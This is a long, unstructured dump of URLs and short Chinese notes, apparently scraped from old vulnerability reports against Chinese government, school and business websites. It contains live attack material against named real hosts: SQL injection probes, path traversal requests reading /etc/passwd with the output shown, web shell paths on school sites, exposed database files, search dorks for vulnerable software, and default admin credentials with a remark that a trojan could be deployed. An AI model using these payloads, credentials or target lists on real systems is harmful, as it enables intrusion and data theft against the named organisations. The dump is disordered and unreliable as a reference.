http://www6.53kf.com/zdy_dbgg2.php?style_id=106059143&company_id=72034014&dbgg_type=2 http://www29.53kf.com/zdy_dbgg2.php?style_id=103697591&company_id=70751158&dbgg_type=2 http://www10.53kf.com/zdy_dbgg2.php?style_id=103555709&company_id=65089675&dbgg_type=2 http://www28.53kf.com/zdy_dbgg2.php?style_id=103818207&company_id=70798983&dbgg_type=1 http://www7.53kf.com/zdy_dbgg2.php?style_id=106081192&company_id=72049384&dbgg_type=2 com.ss.android.essay.zone/com.ss.android.newmedia.downloads.DownloadReceiver http://zzcg.ccgp.gov.cn//zzzc/egp/cm/xxfb/dctp/xinyuanzzvote.jsp?anyone=1 http://bbs.siteserver.cn/ http://bbs.siteserver.cn/ https://59.42.21.101/ http://shop.wapsc.189.cn:80/mobile.php?act=module&name=shopping&do=activityDetail&weid=1&id=5 https://reg.hexun.com/regname.aspx http://i.hexun.com 
http://12094.mmb.cn/wap/findpassword/sendBandPhoneNum.do http://12094.mmb.cn/wap/findpassword/sendBandPhoneNum.do?findPasswordIndex=1&uuniq=1427032972658239 http://rep.mmb.cn/wap/upload/touch/newWap/css/common.css http://rep.mmb.cn/wap/upload/touch/newWap/css/proList.css http://rep.mmb.cn/wap/upload/touch/newWap/css/usermember.css http://rep.mmb.cn/wap/upload/touch/javascript/jquery-1.7.2.min.js http://rep.mmb.cn/wap/upload/touch/newWap/js/password.js inurl:web_meeting/index.php http://demo.techbridge-inc.com url:http://www.uhuibao.com/*****/.*** http://61.178.185.50/lzweb/webpages/webusercaselist.aspx http://qlgk.taixing.gov.cn/webpages/webusercaselist.aspx http://58.222.216.220/ggweb/webpages/webusercaselist.aspx http://58.222.211.21/webpages/webusercaselist.aspx http://61.178.185.50/wwweb/webpages/webusercaselist.aspx http://qlgk.jingjiang.gov.cn/webpages/webusercaselist.aspx site:qfkd.com.cn http://oa.qfkd.com.cn http://new.lefen.cn/admin.php http://csr.hnagroup.com/ http://csr.hnagroup.com/hna-commonweal/resources/pages/console/user/list.jsp http://csr.hnagroup.com/hna-commonweal/resources/pages/console/role/list.jsp http://csr.hnagroup.com/hna-commonweal/resources/pages/console/privilege/list.jsp http://csr.hnagroup.com/hna-commonweal/resources/pages/console/integral/msg.jsp http://oa.homeinns.com/Voucher/tasks/tasklist.aspx http://citiz.online.sh.cn/cloudmail/)允许用户注册任意用户名邮箱,没有屏蔽高危邮箱,可导致任何人向CA申请DV(域名验证)SSL证书。我干的这个事和前几天芬兰人申请微软live.fi域名是一样的[1]。 http://www.myhack58.com/Article/html/1/4/2015/60064.htm https://technet.microsoft.com/en-us/library/security/3046310.aspx https://www.agwa.name/blog/post/how_to_responsibly_misissue_a_cert http://qywx.homeinns.com/rujia/a/login http://202.96.74.3:8081/loginAction.action http://111.39.70.4:81/wcs/profile/load-login http://zzcg.ccgp.gov.cn//xywwzs/xygh/wwzs/spzs/SpzsController.do?lbbh=359803D9E3F2463FB06738EC7489BFCF&method=showPmxx&pmbh=E9EC84F272428FFCE040007F01006BC6'%20AND%203*2*1%3d6%20AND%20'000Yehy'%3d'000Yehy 
http://down.chinaz.com/soft/33644.htm inurl:views.asp?hw_id= http://www.163flower.com/guest.asp http://www.cnvolvo.com/guest.asp http://www.led-jiunpey.com/guest.asp http://www.shjyship.com/guest.asp http://www.td-doll.com/guest.asp http://wap.kuwo.cn/wap/js/mkzy.jsp http://weibotest.gfan.com/webop.gfan.com/ http://webop.gfan.com/ http://weibotest.gfan.com/webop.gfan.com/index.php/sys/user/edit http://m.14213066662968.gw.1688.com/companyinfo.htm?spm=0.0.0.0.eOZluE www.nudt.edu.cn http://cs.53kf.com/forgot_passwd.php http://60.28.196.17/resin-admin/status.php http://project.ddmap.com/wgj/wgj_detail.jsp?id=6474&name=%C7%E0%C6%D6%C7%F8%CE%C4%BB%AF%B9%E3%B2%A5%B5%E7%CA%D3%B9%DC%C0%ED%BE%D6 http://project.ddmap.com/wgj/wgj_detail.jsp?id=6474-1%2b1&name=%C7%E0%C6%D6%C7%F8%CE%C4%BB%AF%B9%E3%B2%A5%B5%E7%CA%D3%B9%DC%C0%ED%BE%D6 http://220.181.35.150 http://blog.ifeng.com/index.php?action=album&op=pview&pid=382359 http://blog.ifeng.com/index.php?action=album&op=pview&pid=382359%20and%201=1 http://blog.ifeng.com/index.php?action=album&op=pview&pid=382359%20and%201=2 www.bjbet.cn)位于北京市海淀区中关村科技园区,是一家快速发展的高新技术企业。 http://www.bjbet.cn/web!newsInfo.action http://www.nongyou.com.cn/ http://61.133.119.187:8091/symItemView/ItemFirst.aspx?id=1 http://222.135.76.147:8200/symItemView/ItemFirst.aspx?id=1 http://222.135.127.190:7200/symItemView/ItemFirst.aspx?id=1 http://221.2.149.47:8200/symItemView/ItemFirst.aspx?id=1 http://218.59.205.41:8053/symItemView/ItemFirst.aspx?id=1 http://jwh.tanljgzx.gov.cn/symItemView/ItemFirst.aspx?id=1 http://221.2.171.59:8200/symItemView/ItemFirst.aspx?id=1 http://218.56.159.98:8001/symItemView/ItemFirst.aspx?id=1 http://123.134.189.60:8016/symItemView/ItemFirst.aspx?id=1 http://www.nongyou.com.cn/ http://61.133.119.187:8091/symItemView/ItemFourth.aspx?id=1 http://222.135.76.147:8200/symItemView/ItemFourth.aspx?id=1 http://222.135.127.190:7200/symItemView/ItemFourth.aspx?id=1 http://221.2.149.47:8200/symItemView/ItemFourth.aspx?id=1 
http://218.59.205.41:8053/symItemView/ItemFourth.aspx?id=1 http://jwh.tanljgzx.gov.cn/symItemView/ItemFourth.aspx?id=1 http://221.2.171.59:8200/symItemView/ItemFourth.aspx?id=1 http://218.56.159.98:8001/symItemView/ItemFourth.aspx?id=1 http://123.134.189.60:8016/symItemView/ItemFourth.aspx?id=1 http://220.181.105.88:9080/ http://v30.sosgps.net.cn/systemindex.do http://175.45.7.217:9070/mywo/loginAction.action http://www.fslib.com.cn/oldfslib/FslibInfo/Tribe/view.asp?ID=289 http://chjw.njau.edu.cn/showinfo.asp?id=728 http://zyz.sdemo.gov.cn/ http://www.nongyou.com.cn/ http://61.133.119.187:8091/symItemView/ItemSixth.aspx?id=1 http://222.135.76.147:8200/symItemView/ItemSixth.aspx?id=1 http://222.135.127.190:7200/symItemView/ItemSixth.aspx?id=1 http://221.2.149.47:8200/symItemView/ItemSixth.aspx?id=1 http://218.59.205.41:8053/symItemView/ItemSixth.aspx?id=1 http://jwh.tanljgzx.gov.cn/symItemView/ItemSixth.aspx?id=1 http://221.2.171.59:8200/symItemView/ItemSixth.aspx?id=1 http://218.56.159.98:8001/symItemView/ItemSixth.aspx?id=1 http://123.134.189.60:8016/symItemView/ItemSixth.aspx?id=1 http://61.133.119.187:8091/symItemView/ItemSecond.aspx?id=1 http://222.135.76.147:8200/symItemView/ItemSecond.aspx?id=1 http://222.135.127.190:7200/symItemView/ItemSecond.aspx?id=1 http://221.2.149.47:8200/symItemView/ItemSecond.aspx?id=1 http://218.59.205.41:8053/symItemView/ItemSecond.aspx?id=1 http://jwh.tanljgzx.gov.cn/symItemView/ItemSecond.aspx?id=1 http://221.2.171.59:8200/symItemView/ItemSecond.aspx?id=1 http://218.56.159.98:8001/symItemView/ItemSecond.aspx?id=1 http://123.134.189.60:8016/symItemView/ItemSecond.aspx?id=1 www.gyebank.com http://www.gtjaqh.com/gtjafe/jsp/calendar/dealCalendar.action http://www.10010nm.com/myorder/searchOrderDetail.action?orderid=1309134219 http://mail.scihc.net/editor/filemanager/upload/php/upload.php http://mail.cdzk.org:8888/editor/filemanager/connectors/php/upload.php http://mail.scihc.net/editor/filemanager/upload/php/upload.php 
http://mail.ziyang.gov.cn/editor/filemanager/upload/php/upload.php http://oa.chinacrt.com/editor/filemanager/connectors/php/upload.php http://mail.cngy.gov.cn:8888/editor/filemanager/upload/php/upload.php https://mail.ichengsi.com:4443/editor/filemanager/upload/php/upload.php http://mail.ccpc.cq.cn/editor/filemanager/connectors/php/upload.php http://mail.ksitri.com/editor/filemanager/connectors/php/upload.php http://mail.smjy.net//editor/filemanager/upload/php/upload.php http://mail.sztour.com.cn//editor/filemanager/connectors/php/upload.php http://www.100fen.com/editor/filemanager/connectors/php/upload.php http://gmail.njx.cn/editor/filemanager/connectors/php/upload.php http://222.208.63.35/editor/filemanager/upload/php/upload.php http://mail.shenzhougroup.com//editor/filemanager/connectors/php/upload.php http://newspaper.jinchengbank.com/editor/filemanager/connectors/php/upload.php http://mail.scihc.net/editor/filemanager/upload/php/upload.php?Type=Media http://kf.07073.com/ http://i.epoint.com.cn/EpointWeb/RegisterUser/forgetPassword.aspx http://www.zjlib.cn/shutui/shownews.asp?id=25 http://guanggao.guoshi.com/teacher/admin/login.php http://202.96.67.34/corporate/webpages/login.jsp http://www.tongda2000.com/oa/group/ http://www.day900.com/ inurl:web_meeting/index.php http://huizhi2000.xicp.net/common/web_meeting/index.php?module=join_meeting&userId=1&siteId=10 http://admin.keruyun.com/.svn/entries http://admin.keruyun.com/loginmn.php http://12094.mmb.cn/wap/touch/user/member/inputCheckCode.jsp http://www.ycks.gov.cn/msg.php?id=6388 http://mooc1.chaoxing.com/moocAnalysis/statistics-tch?courseId=******&classId=******&ut=t country:China http://111.39.38.135:81/ http://huodong.tiancity.com http://www.nongyou.com.cn/ http://61.133.119.187:8091/symItemView/ItemThird.aspx?id=1 http://222.135.76.147:8200/symItemView/ItemThird.aspx?id=1 http://222.135.127.190:7200/symItemView/ItemThird.aspx?id=1 http://221.2.149.47:8200/symItemView/ItemThird.aspx?id=1 
http://218.59.205.41:8053/symItemView/ItemThird.aspx?id=1 http://jwh.tanljgzx.gov.cn/symItemView/ItemThird.aspx?id=1 http://221.2.171.59:8200/symItemView/ItemThird.aspx?id=1 http://218.56.159.98:8001/symItemView/ItemThird.aspx?id=1 http://123.134.189.60:8016/symItemView/ItemThird.aspx?id=1 http://111.1.6.10/login.do http://jwxt.hifa.edu.cn/jiaowu/jwxs/login.asp http://221.232.159.24/dhjw/jwxs/login.asp http://jiaowu.hustwenhua.net/jwxs/login.asp http://xscx.cmcedu.cn/jwxs/login.asp http://jwxt.hycgy.com:5000/jwxs/login.asp http://221.232.159.24/dhjw/jwxs/login.asp http://www.ync365.com http://www.ync365.com/resetPassword.php?act=default&type=users www.ync365.com www.ync365.com inurl:viewreturn.asp http://www.2000textile.com/viewreturn.asp http://www.szluozuan.com/viewreturn.asp http://www.yixiuf.com/viewreturn.asp http://www.lyfanjiang.com/viewreturn.asp http://www.itemai.com/viewreturn.asp http://www.vipasp.com inurl:cat.asp?catid= http://www.nnfyz.com/shop2/mess.asp http://www.stoneups.com.cn/mess.asp http://www.dxsdbbt.com/mess.asp http://www.10bags.com/shop60/mess.asp http://www.hcgpk.com/mess.asp http://222.211.94.7:8080/ http://toutiao.com/a3735350279/ http://221.130.137.33:81/wsyj/private/login.xp http://61.133.142.90/hfcg/private/login.xp http://60.166.60.60:8088/fdwsyj/private/login.xp http://220.178.102.142/lzReport/private/login.xp http://www.wstka.com/ebank/ebank/login.xp http://61.133.142.90/hfcg/private/login.xp http://27.54.228.74:8088/hfss/private/login.xp http://221.130.137.33:81/wsyj/private/login.xp http://60.166.60.60:8088/fdwsyj/private/login.xp http://220.178.60.10:6001/fxwsyj/private/login.xp http://218.23.112.74:81/cfwsyj/private/login.xp http://221.130.137.33:82/yhwsyj/private/login.xp http://220.180.238.128:8002/sswsyj/private/login.xp http://221.130.137.33:81/bhwsyj/private/login.xp http://zwgk.hefei.gov.cn/zwgk/private/login.xp http://220.178.49.19/qgjx/private/login.xp http://183.166.59.231:8080/hn_szrx/private/login.xp 
http://www.hfswj.gov.cn/hfbusiness/private/login.xp http://www.ahmg.gov.cn:9999/login.xp http://220.178.102.142/lzReport/private/login.xp http://www.wstka.com/ebank/ebank/login.xp http://120.210.74.12/easygoal/login.xp http://zyfw.hefei.gov.cn/wmb/private/login.xp http://61.133.142.58/xmscoa/private/login.xp http://www.029ly.cn/order/order.jsp?info_id=7087274 http://www.shanhaitian.net/order/order.jsp?info_id=7275941 http://www.liuliuka.com/order/order.jsp?info_id=7127739 http://www.yungusi.com/order/order.jsp?info_id=7405780 http://www.xlcholiday.com/order/order.jsp?info_id=7443382 http://www.playzhuhai.com/order.jsp?info_id=7412609 http://www.haolvyou.cn/order/order.jsp?info_id=5966371 http://www.51704.com/order/order.jsp?info_id=7134981 http://www.80000t.com/order/order.jsp?info_id=7388741 http://www.youjiaguolv.com/order/order.jsp?info_id=7397742 http://www.bjiub.com/order/order.jsp?info_id=7531163 http://www.bjiub.com/order/order.jsp?info_id=7531163 http://www.youjiaguolv.com/order/order.jsp?info_id=7397742 http://www.nongyou.com.cn/ http://222.135.76.147:8200/symItemManage/ItemForth.aspx?id=11 http://222.135.127.190:7200/symItemManage/ItemForth.aspx?id=11 http://221.2.149.47:8200/symItemManage/ItemForth.aspx?id=11 http://218.59.205.41:8053/symItemManage/ItemForth.aspx?id=11 http://jwh.tanljgzx.gov.cn/symItemManage/ItemForth.aspx?id=11 http://221.2.171.59:8200/symItemManage/ItemForth.aspx?id=11 http://218.56.159.98:8001/symItemManage/ItemForth.aspx?id=11 http://123.134.189.60:8016/symItemManage/ItemForth.aspx?id=11 http://www.shanghailima.com/admin/login.aspx https://www.lantian.gov.cn/func/web_main/display/frame/main http://piao.5iwuxi.cn/show_prod.jsp?info_id=7547904 http://menpiao.czyts.net/show_prod.jsp?info_id=7308733 http://www.playzhuhai.com/show_prod.jsp?info_id=7412619 http://mp.dreams-travel.com/show_prod.jsp?info_id=7310340 http://6666.aipiaoke.com/show_prod.jsp?info_id=7309038 http://mp.yoyoo.sh.cn/show_prod.jsp?info_id=6026600 
http://www.booking4u.cn/show_prod.jsp?info_id=6019974 http://ticket.cadacac.com/show_prod.jsp?info_id=7410565 http://piaowu.qianggen.com/show_prod.jsp?info_id=7308989 http://menpiao.wxchunqiu.com/show_prod.jsp?info_id=7308839 http://mp.cctsh.com/show_prod.jsp?info_id=6026427 http://mp.cctsh.com/show_prod.jsp?info_id=6026427 http://menpiao.wxchunqiu.com/show_prod.jsp?info_id=7308839 http://183.62.232.65:800/zentao/my/ http://www.ciccphoto.com/ http://www.ciccphoto.com:80/center/json/returnCityeList?&redirect:xxx${13579246-1 http://fb.itools.cn/ http://data.99.com/ http://data.99.com/admin/RelationMenu.aspx?MenuID=1 http://122.227.148.185:8080/agent http://122.227.148.185:8080/console/,用户名密码是weblogic/weblogic1,可部署war木马,发现漏洞后,没进一步测试。 http://rumor.nownews.com/pro/get_hot.php?st=0&sk=2%20and%201=2&sd=0&pages=30&pageno=0&jsoncallback=jQuery16104215633808635175_1427043938655&_=1427044024528 rumor.nownews.com/pro/get_examine.php?st=1&sk=1&ss=3&pages=30&pageno=0&jsoncallback=jQuery16104895329086518111_1427044233726&_=1427044239989 http://pad.101.com/ http://mall.pad.101.com/ http://mall.pad.101.com/attached/image/feedbacks/201503231458_wooyun.jsp http://job.anjuke.com/resume/edit/?resume_id=3,参数resume_id可遍历,遍历后可以看到不同用户简历信息,经测试只有含测试数据在内7条数据,可能刚上线不久 http://bhyfsyjd.buaa.edu.cn/)存在命令执行漏洞,可远程获取系统管理权限。 http://wooyun.org/bugs/wooyun-2010-034715 http://wap.vanho.cn/index.action http://www.ugift.com.cn/ReviewOrder.action?orderType=1&orderId=1 http://www.ugift.com.cn/ReviewOrder.action?orderType=1&orderId=7873 http://down.chinaz.com/soft/34793.htm inurl:area.asp http://pos.sy1788.com//data/3gushop.mdb http://www.nxfzc.com/data/3gushop.mdb http://www.007cr.com//data/3gushop.mdb http://www.meifas.com//data/3gushop.mdb http://cn781238.124110.168.bz//data/3gushop.mdb http://www.cnzisha.cn//data/3gushop.mdb http://www.yaotiao51.com//data/3gushop.mdb http://nzxmxb.quxint.com//data/3gushop.mdb http://mall.pad.101.com/manage/admin.jsp inurl:index.php?shownews- 
http://static.wooyun.org/wooyun/upload/201503/14214138680ee3f512bd981d4db57e2370306716.jpg http://static.wooyun.org/wooyun/upload/201503/14214301df83b12c23953d81fdc3d9e0c5002662.jpg http://www.maspf.gov.cn/siteserver/login.aspx http://119.254.70.48:8080/hcm/usr/loginLdap.action http://dgdz.xzit.edu.cn/model/twogradepage/equipmentlist.aspx?columnId=243 http://yqgx.zstu.edu.cn/model/TwoGradePage/equipmentlist.aspx?columnId=68&xueyuan=%E6%80%BB%E5%8A%A1%E5%A4%84 http://yq.hqu.edu.cn/model/TwoGradePage/equipmentlist.aspx?columnId=68&xueyuan=%E5%BB%BA%E7%AD%91%E5%AD%A6%E9%99%A2 http://59.69.101.10/model/TwoGradePage/equipmentlist.aspx?columnId=68&xueyuan=%C3%A6%C2%9D%C2%90%C3%A6%C2%96%C2%99%C3%A5%C2%AD%C2%A6%C3%A9%C2%99%C2%A2 http://labch.cumt.edu.cn:81/model/TwoGradePage/equipmentlist.aspx?columnId=68&xueyuan=材料学院 http://dxsb.qfnu.edu.cn/model/TwoGradePage/equipmentlist.aspx?columnId=68&xueyuan=%E5%BB%BA%E7%AD%91%E5%AD%A6%E9%99%A2 http://lab.hutc.zj.cn:8070/model/TwoGradePage/equipmentlist.aspx?columnId=68&xueyuan=%E5%BB%BA%E7%AD%91%E5%AD%A6%E9%99%A2 http://clpt.ecust.edu.cn/model/TwoGradePage/equipmentlist.aspx?columnId=68&xueyuan=%E5%BB%BA%E7%AD%91%E5%AD%A6%E9%99%A2 http://210.36.17.227/model/TwoGradePage/equipmentlist.aspx?columnId=68&xueyuan=%E5%BB%BA%E7%AD%91%E5%AD%A6%E9%99%A2 http://121.192.178.138/model/TwoGradePage/equipmentlist.aspx?columnId=68&xueyuan=%E5%BB%BA%E7%AD%91%E5%AD%A6%E9%99%A2 http://down.chinaz.com/soft/34793.htm http://www.em.gxnu.edu.cn/about.php?id=1 http://www.weirongdai.com/bbs/admin.php http://www.weirongdai.com/phpmyadmin/index.php http://www.kesion.com/Product/ http://down.chinaz.com/soft/30486.htm inurl:dir_url.asp?id= http://www.nbjbtsyey.com/dir_url.asp?id=12 http://www.zhusiarts.com/dir_url.asp?id=21 http://www.jd19s.com/dir_url.asp?id=23 http://www.jmxjjb.com/dir_url.asp?id=2 http://www.szakpx.com/dir_url.asp?id=22 http://www.nbjbtsyey.com/dir_url.asp?id=12 http://www.fjzzedu.com/dir_url.asp?id=21 
http://www.hbxwedu.cn/dir_url.asp?id=21 www.lavago.com http://yk.csm.91160.com, http://ting.zhangyue.com/360/recommand?id=22 http://ah2.zhangyue.com/info.php http://114.255.123.95/hot/hosp_list_by_topic.htm?channelId=115 http://bbs.kaoyancn.com/config/.config_ucenter.php.swp http://login.lianjia.com/login/register?redirect=http://user.lianjia.com/ http://**.**.**/login/login.htm http://202.108.49.130/ltzx/sc_index.asp?keyword=1 http://www.day900.com/ http://360.zhangyue.com/zybook/u/p/book.php?key=4B4%27#id4 http://weizhonggou.com/goods_list/17_0_0 http://weizhonggou.com/goods/206515 http://110.249.253.5:8000/login.action http://www.czpost.com.cn/index.asp www.czpost.com.cn http://www.czpost.com.cn http://www.smeyl.gov.cn/smeyl.rar http://www.smeyl.gov.cn/phpmyadmin/ http://www.smeyl.gov.cn/bab.php http://qhd.cstor.cn http://www.gdiot.cn/index.php?m=search&c=index&a=public_get_suggest_keyword&url=asdf&q=../../phpsso_server/caches/configs/database.php http://www.gdiot.cn/phpmyadmin/ http://tv.tcl.com http://ad.toutiao.com/ http://ad.toutiao.com/ad/lingyun_create_site/?type=1 http://42.96.190.138/index.php?m=Activity&a=finish&catid=55122&id=603&isajax=1 http://42.96.190.138/index.php?m=Coupon&a=update&id=5 http://econline.cpf.com.cn:8080/NASApp/iTreasury-ebank/Init_signature.jsp http://econline.cpf.com.cn:8080/NASApp/iTreasury-ebank/DownloadFile.web?fileName=/etc/passwd lp:/bin/false invscout:/usr/bin/ksh user:/usr/sbin/snapp:/usr/sbin/snappd ipsec:/usr/bin/ksh user:/var/spool/uucppublic:/usr/sbin/uucp/uucico pconsole:/usr/bin/ksh esa:/usr/bin/ksh empty:/usr/bin/ksh mont:/usr/bin/ksh rt:/usr/bin/ksh http://econline.cpf.com.cn:8080/NASApp/iTreasury-ebank/DownloadFile.web?fileName=/etc/ftpusers http://m2.people.cn/apps/weixin_share/s.php?id=MTM= http://m2.people.cn/apps/weixin_share/s.php?id=MTM= url:http://161.207.5.195/NASApp/cpf/distribute/index.jsp http://161.207.5.195/NASApp/cpf/DownLoadServlet?disDownDir=../../../../../etc/passwd lp:/bin/false 
invscout:/usr/bin/ksh user:/usr/sbin/snapp:/usr/sbin/snappd ipsec:/usr/bin/ksh user:/var/spool/uucppublic:/usr/sbin/uucp/uucico pconsole:/usr/bin/ksh esa:/usr/bin/ksh empty:/usr/bin/ksh mont:/usr/bin/ksh rt:/usr/bin/ksh http://161.207.5.195/NASApp/cpf/DownLoadServlet?disDownDir=../../../../../etc/host feee:2b7f http://218.30.105.75/soufun/ admin:admin http://218.70.110.252/Login.aspx?ReturnUrl=%2fDefault.aspx http://218.70.110.252 http://www.day900.com/ http://www.day900.com/general/crm/apps/crm/include/search.php?ENTITY=crm_marketing&PAGE_SIZE=10&CUR_PAGE=&ORDERFIELD=&ORDERTYPE=&USER_VIEW=1706 payload:ENTITY=crm_marketing http://www.day900.com http://www.day900.com/general/mytable/intel_view/workflow.php?MAX_COUNT=15&TYPE=3&MODULE_SCROLL=false&MODULE_ID=55&MODULE_ID=Math.random http://amd.scnu.edu.cn/eam/homepage/home/viewCenterframe.jsp?id=49000&type=5%27 http://115.28.252.161/admin/ url:http://barcode.bgp.com.cn:8090/index http://url/Aspx/HelpCenter/AskAnswer.aspx http://218.65.66.77:81/Default.aspx?pagetype=wzjz&casetype=7 http://111.75.190.101:90/ http://218.3.44.194/ http://sgaj.aps.gov.cn/ http://bsdt.jxfzgaj.gov.cn/ http://elearning.corp.elong.com/Showknowledge.aspx?id=214 http://www.day900.com/ http://www.chre.cn/qywh/qywh.asp?classid=004001%27 http://www.day900.com/ http://jmzx.xmedu.cn:9999/anmai/Elective/ClassInfo/CallOverDown.aspx?itemid=1 http://www.gxbyzx.cn:88/anmai/Elective/ClassInfo/CallOverDown.aspx?itemid=1 http://szxx.pudong-edu.sh.cn/anmai/Elective/ClassInfo/CallOverDown.aspx?itemid=1 http://218.78.241.80/anmai/Elective/ClassInfo/CallOverDown.aspx?itemid=1 http://www.xwgjzx.com:8888/anmai/Elective/ClassInfo/CallOverDown.aspx?itemid=1 http://www.ligchina.com.cn/news/news.asp?newsid=0 http://218.59.228.162/wscgsxxcx/login.do?mm=1&state=&type=dl&yhdh=1 http://123.130.246.26:9080/qszxyw/bljsz.do url:http://hotels.yonyou.com/ajax_action/get_index_lable?cityid=0101&type=135 http://app.info.hc360.com/design/login.aspx http://app.info.hc360.com 
http://jsw.e-health.org.cn/resin-admin/status.php http://jsw.e-health.org.cn/resin-doc/examples/db-jdbc/viewfile?file=WEB-INF/resin-web.xml http://jsw.e-health.org.cn/resin-doc/viewfile/?contextpath=/.\../&servletpath=&file=index.jsp http://b2b.haier.com:80/ http://www.zjpost.com//gift/loginAction.action www.zjpost.com/loadNewsListInFront.do www.zjpost.com/loadNewsListInFront.do http://61.191.25.24/edit/attached/ http://61.191.25.24/upload/ http://202.108.99.81/article/Article!detailArt.action http://life.cyberway.net.cn/community?name=a http://sqlmap.org http://jys.zjedu.org/jxyj.aspx?type=45&&type_=87 http://www.tjportnet.com/member/index.jsp http://jmzx.xmedu.cn:9999/anmai/Edis/home_school/restoredelete.aspx?cz=del&childid=1 http://www.gxbyzx.cn:88/anmai/Edis/home_school/restoredelete.aspx?cz=del&childid=1 http://szxx.pudong-edu.sh.cn/anmai/Edis/home_school/restoredelete.aspx?cz=del&childid=1 http://218.78.241.80/anmai/Edis/home_school/restoredelete.aspx?cz=del&childid=1 http://www.xwgjzx.com:8888/anmai/Edis/home_school/restoredelete.aspx?cz=del&childid=1s http://www.wl96345.gov.cn/EnterpriseWeb/Enterprise/Default.aspx?Code=07 http://www.cn96345.gov.cn/EnterpriseWeb/Enterprise/Default.aspx?Code=17 http://www.yjhl12312.gov.cn/EnterpriseWeb/Enterprise/Default.aspx?code=17 http://12345.jxfz.gov.cn/InteractiveWeb/Enterprise/Default.aspx?Code=01 http://www.lq96345.cn/Enterprise/Default.aspx?Code=006 http://www.mzmzj.gov.cn/aboutme.asp?id=5 http://www.vjianke.com/VQLTS.clip http://www.520hzty.com,以其为例 http://www.520hzty.com//Manage/ http://www.520hzty.com//Manage/Admin/AddMenus http://www.520hzty.com//Manage/Admin/MenusList http://www.520hzty.com//Manage/admin/SiteSetting http://www.520hzty.com//Manage/CheckUser/List http://www.520hzty.com//Manage/admin/RoleList http://www.520hzty.com/Manage/admin/ModifyPower/1 http://www.520hzty.com/Manage/admin/ModifyPower/29 http://www.520hzty.com/Manage/admin/ModifyPower/30 http://www.520hzty.com/Manage/admin/ModifyPower/31 
http://www.520hzty.com/Manage/admin/ModifyPower/20 http://www.520hzty.com/Manage/AlbumInfo/List http://www.520hzty.com/Manage/AlbumInfo/List http://www.520hzty.com/Manage/Base/UpLoadImg http://www.520hzty.com/Upload/2015-03/20150323220318.asp http://www.520hzty.com/Upload/2015-03/20150323222147.asp http://www.dcyjw.com.cn/Manage//AlbumInfo/List http://www.dcyjw.com.cn//Upload/ImgFile/2015-03/20150323224607.asp http://www.hzttxx.com/Manage//AlbumInfo/List http://www.hzttxx.com/Upload/ImgFile/2015-03/20150323225250.asp http://www.hzttxx.com/Upload/ImgFile/2015-03/20150323225548.aspx http://www.lhgkids.com//Manage//AlbumInfo/List http://www.slxx.cn/manage//AlbumInfo/List http://www.yhcxey.com//manage//AlbumInfo/List http://www.520hzty.com//Manage/AlbumInfo/List http://www.lanxixxxx.com/Manage/AlbumInfo/List http://ywdtxx.com/Manage/AlbumInfo/List http://www.fyfcsy.com//Manage/AlbumInfo/List http://www.jsshtxx.com/Manage/AlbumInfo/List inurl:8080/rcc/ http://egov.pzhzw.gov.cn:8080/rcc/servlet/complaintsMgrServlet?flag=list&type=0 http://egov.zggjzw.gov.cn:8080/rcc/servlet/complaintsMgrServlet?flag=list&type=0 http://egov.fszw.cn:8080/rcc/servlet/complaintsMgrServlet?flag=list&type=0 http://egov.eyqzw.gov.cn:8080/rcc/servlet/complaintsMgrServlet?flag=list&type=0 http://egov.hyzwfw.gov.cn:8080/rcc/servlet/complaintsMgrServlet?flag=list&type=0 http://egov.pczw.gov.cn:8080/rcc/servlet/complaintsMgrServlet?flag=list&type=0 http://egov.zyyjzw.gov.cn:8080/rcc/servlet/complaintsMgrServlet?flag=list&type=0 http://www.shzw.gov.cn:8080/rcc/servlet/complaintsMgrServlet?flag=list&type=0 http://egov.qczw.gov.cn:8080/rcc/review_insert.jsp http://egov.wangcangzw.gov.cn:8080/rcc/servlet/complaintsMgrServlet?flag=list&type=0 http://egov.zgzw.gov.cn:8080/rcc/servlet/complaintsMgrServlet?flag=list&type=0 http://egov.jgzw.gov.cn:8080/rcc/servlet/complaintsMgrServlet?flag=list&type=0 http://egov.wyzw.gov.cn:8080/rcc/servlet/complaintsMgrServlet?flag=list&type=0 
http://www.zyjyzw.gov.cn:8080/rcc/servlet/complaintsMgrServlet?flag=list&type=0 http://egov.glzwzx.gov.cn:8080/rcc/servlet/complaintsMgrServlet?flag=list&type=0 http://egov.guang-an.gov.cn:8080/rcc/servlet/complaintsMgrServlet?flag=list&type=0 http://egov.ajzw.gov.cn:8080/rcc/servlet/complaintsMgrServlet?flag=list&type=0 http://egov.xhzw.gov.cn:8080/rcc/servlet/complaintsMgrServlet?flag=list&type=0 http://egov.scdongqu.gov.cn:8080/rcc/servlet/complaintsMgrServlet?flag=list&type=0 http://egov.sclzzw.gov.cn:8080/rcc/servlet/complaintsMgrServlet?flag=list&type=0 http://egov.neijiangshizhongqu.gov.cn:8080/rcc/servlet/complaintsMgrServlet?flag=list&type=0 http://egov.lxzwzx.gov.cn:8080/rcc/servlet/complaintsMgrServlet?flag=list&type=0 http://egov.guanghan.gov.cn:8080/rcc/servlet/complaintsMgrServlet?flag=list&type=0 http://egov.lzzwfw.gov.cn:8080/rcc/servlet/complaintsMgrServlet?flag=list&type=0 http://egov.hjxzwzx.gov.cn:8080/rcc/servlet/complaintsMgrServlet?flag=list&type=0 http://egov.zggjzw.gov.cn:8080/rcc/servlet/complaintsMgrServlet?flag=list&type=0 cn:8080 http://egov.zggjzw.gov.cn:8080 http://202.103.211.14/ http://*/inc/downfj.asp,无意中发现,文章中的附件下载地址是这样的,http://hzymjx.com/inc/downfj.asp?path=/media/down/Web/source/Other/GoogleEarthWin_final.zip&filename=GoogleEarthWin_final.zip http://hzymjx.com/inc/downfj.asp?path=%2Fmedia%2Fdown%2FWeb%2Fsource%2FOther%2F../../../../../inc/downfj.asp&filename=downfj.asp http://yhslxx.yd-jxt.com/inc/downfj.asp?path=%2Fmedia%2Fdown%2FWeb%2Fsource%2FOther%2F../../../../../inc/downfj.asp&filename=downfj.asp http://tlyzxx.yd-jxt.com/inc/downfj.asp?path=%2Fmedia%2Fdown%2FWeb%2Fsource%2FOther%2F../../../../../inc/conn.asp&filename=conn.asp http://www.yhslxx.net/inc/downfj.asp?path=%2Fmedia%2Fdown%2FWeb%2Fsource%2FOther%2F../../../../../inc/conn.asp&filename=conn.asp http://jtyey.ysxqjy.com/inc/downfj.asp?path=%2Fmedia%2Fdown%2FWeb%2Fsource%2FOther%2F../../../../../inc/conn.asp&filename=conn.asp 
